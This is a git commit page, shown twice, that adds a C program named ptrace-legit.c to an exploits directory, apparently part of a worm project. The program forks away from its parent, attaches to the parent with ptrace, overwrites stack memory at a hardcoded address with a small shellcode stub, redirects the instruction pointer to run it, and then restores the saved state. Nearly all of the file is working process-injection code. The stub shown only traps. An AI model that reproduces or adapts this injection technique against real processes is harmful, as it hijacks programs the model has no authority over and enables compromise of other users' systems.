initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /exploits/7350wurm/shellcode/ptrace
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
2 files changed, 192 insertions, 0 deletions
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
new file mode 100644
index 0000000..e3e02c1
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
Binary files differ
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
new file mode 100644
index 0000000..870da8a
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@
+/* -scutstyle */
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+pid_t z_fork (void);
+void hexdump (unsigned char *data, unsigned int amount);
+unsigned char   shellcode[] = "\x90\x90\xcc\x73";
+int
+main (int argc, char *argv[])
+{
+        pid_t                   cpid;
+        struct user             regs;
+        unsigned long int       safed_eip;
+        unsigned long int       addr,
+                                addr_walker;
+        unsigned char           data_saved[256];
+#if 0
+        if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) {
+                printf ("usage: %s <pid>\n", argv[0]);
+                exit (EXIT_FAILURE);
+        }
+#endif
+        cpid = getppid();
+        if (z_fork () != 0) {
+                printf ("parent. exiting.\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("pid = %d\n", cpid);
+        printf ("exploiting\n\n");
+        if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace");
+                exit (EXIT_FAILURE);
+        }
+        /* save data */
+        addr = 0xbffff010;
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
+                        addr + addr_walker, NULL);
+        }
+        hexdump (data_saved, sizeof (data_saved));
+        /* write */
+        for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
+                ++addr_walker)
+        {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        shellcode[addr_walker] & 0xff);
+        }
+        /* redirect eip */
+        memset (&regs, 0, sizeof (regs));
+        if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        // write eip */
+        safed_eip = regs.regs.eip;
+        regs.regs.eip = 0xbffff010;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_CONT");
+                exit (EXIT_FAILURE);
+        }
+        wait (NULL);
+        printf ("detrap\n");
+        /* restore */
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        data_saved[addr_walker] & 0xff);
+        }
+        /* restore regs */
+        regs.regs.eip = safed_eip;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+        exit (EXIT_SUCCESS);
+}
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+        return;
+}
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ *         differentiate between parent and not parent, the pid of the
+ *         child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+pid_t
+z_fork (void)
+{
+        pid_t   pid;
+        pid = fork ();
+        if (pid < 0) {
+                return (pid);
+        } else if (pid == 0) {
+                /* let the child fork again
+                 */
+                pid = fork ();
+                if (pid < 0) {
+                        return (pid);
+                } else if (pid > 0) {
+                        /* let the child and parent of the second child
+                         * exit
+                         */
+                        exit (EXIT_SUCCESS);
+                }
+                return (0);
+        }
+        waitpid (pid, NULL, 0);
+        return (pid);
+}
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /exploits/7350wurm/shellcode/ptrace
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit new file mode 100644 index 0000000..e3e02c1 --- /dev/null +++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
Binary files differ


diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c new file mode 100644 index 0000000..870da8a --- /dev/null +++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@
	1	/* -scutstyle */
	2
	3	#include <sys/types.h>
	4	#include <sys/ptrace.h>
	5	#include <sys/wait.h>
	6	#include <sys/user.h>
	7	#include <unistd.h>
	8	#include <stdlib.h>
	9	#include <stdio.h>
	10
	11
	12	pid_t z_fork (void);
	13	void hexdump (unsigned char *data, unsigned int amount);
	14
	15	unsigned char shellcode[] = "\x90\x90\xcc\x73";
	16
	17	int
	18	main (int argc, char *argv[])
	19	{
	20	pid_t cpid;
	21	struct user regs;
	22	unsigned long int safed_eip;
	23	unsigned long int addr,
	24	addr_walker;
	25	unsigned char data_saved[256];
	26
	27
	28	#if 0
	29	if (argc != 2 \|\| sscanf (argv[1], "%d", &cpid) != 1) {
	30	printf ("usage: %s <pid>\n", argv[0]);
	31	exit (EXIT_FAILURE);
	32	}
	33	#endif
	34	cpid = getppid();
	35	if (z_fork () != 0) {
	36	printf ("parent. exiting.\n");
	37	exit (EXIT_FAILURE);
	38	}
	39
	40	printf ("pid = %d\n", cpid);
	41
	42	printf ("exploiting\n\n");
	43
	44	if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
	45	perror ("ptrace");
	46	exit (EXIT_FAILURE);
	47	}
	48
	49	/* save data */
	50	addr = 0xbffff010;
	51	for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
	52	data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
	53	addr + addr_walker, NULL);
	54	}
	55	hexdump (data_saved, sizeof (data_saved));
	56
	57	/* write */
	58	for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
	59	++addr_walker)
	60	{
	61	ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
	62	shellcode[addr_walker] & 0xff);
	63	}
	64
	65	/* redirect eip */
	66	memset (&regs, 0, sizeof (regs));
	67	if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
	68	perror ("ptrace PTRACE_GETREGS");
	69	exit (EXIT_FAILURE);
	70	}
	71	// write eip */
	72	safed_eip = regs.regs.eip;
	73	regs.regs.eip = 0xbffff010;
	74	if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
	75	perror ("ptrace PTRACE_GETREGS");
	76	exit (EXIT_FAILURE);
	77	}
	78
	79	if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
	80	perror ("ptrace PTRACE_CONT");
	81	exit (EXIT_FAILURE);
	82	}
	83
	84	wait (NULL);
	85	printf ("detrap\n");
	86
	87	/* restore */
	88	for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
	89	ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
	90	data_saved[addr_walker] & 0xff);
	91	}
	92
	93	/* restore regs */
	94	regs.regs.eip = safed_eip;
	95	if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
	96	perror ("ptrace PTRACE_GETREGS");
	97	exit (EXIT_FAILURE);
	98	}
	99
	100	if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
	101	perror ("ptrace PTRACE_DETACH");
	102	exit (EXIT_FAILURE);
	103	}
	104
	105	exit (EXIT_SUCCESS);
	106	}
	107
	108
	109
	110	void
	111	hexdump (unsigned char *data, unsigned int amount)
	112	{
	113	unsigned int dp, p; /* data pointer */
	114	const char trans[] =
	115	"................................ !\"#$%&'()*+,-./0123456789"
	116	":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
	117	"nopqrstuvwxyz{\|}~...................................."
	118	"....................................................."
	119	"........................................";
	120
	121	for (dp = 1; dp <= amount; dp++) {
	122	printf ("%02x ", data[dp-1]);
	123	if ((dp % 8) == 0)
	124	printf (" ");
	125	if ((dp % 16) == 0) {
	126	printf ("\| ");
	127	p = dp;
	128	for (dp -= 16; dp < p; dp++)
	129	printf ("%c", trans[data[dp]]);
	130	printf ("\n");
	131	}
	132	}
	133	if ((amount % 16) != 0) {
	134	p = dp = 16 - (amount % 16);
	135	for (dp = p; dp > 0; dp--) {
	136	printf (" ");
	137	if (((dp % 8) == 0) && (p != 8))
	138	printf (" ");
	139	}
	140	printf (" \| ");
	141	for (dp = (amount - (16 - p)); dp < amount; dp++)
	142	printf ("%c", trans[data[dp]]);
	143	}
	144	printf ("\n");
	145
	146	return;
	147	}
	148
	149
	150	/* z_fork
	151	*
	152	* fork and detach forked client completely to avoid zombies.
	153	* taken from richard stevens excellent system programming book :) thanks,
	154	* whereever you are now.
	155	*
	156	* caveat: the pid of the child has already died, it can just be used to
	157	* differentiate between parent and not parent, the pid of the
	158	* child is inaccessibly.
	159	*
	160	* return pid of child for old process
	161	* return 0 for child
	162	*/
	163
	164	pid_t
	165	z_fork (void)
	166	{
	167	pid_t pid;
	168
	169	pid = fork ();
	170	if (pid < 0) {
	171	return (pid);
	172	} else if (pid == 0) {
	173	/* let the child fork again
	174	*/
	175
	176	pid = fork ();
	177	if (pid < 0) {
	178	return (pid);
	179	} else if (pid > 0) {
	180	/* let the child and parent of the second child
	181	* exit
	182	*/
	183	exit (EXIT_SUCCESS);
	184	}
	185
	186	return (0);
	187	}
	188
	189	waitpid (pid, NULL, 0);
	190
	191	return (pid);
	192	}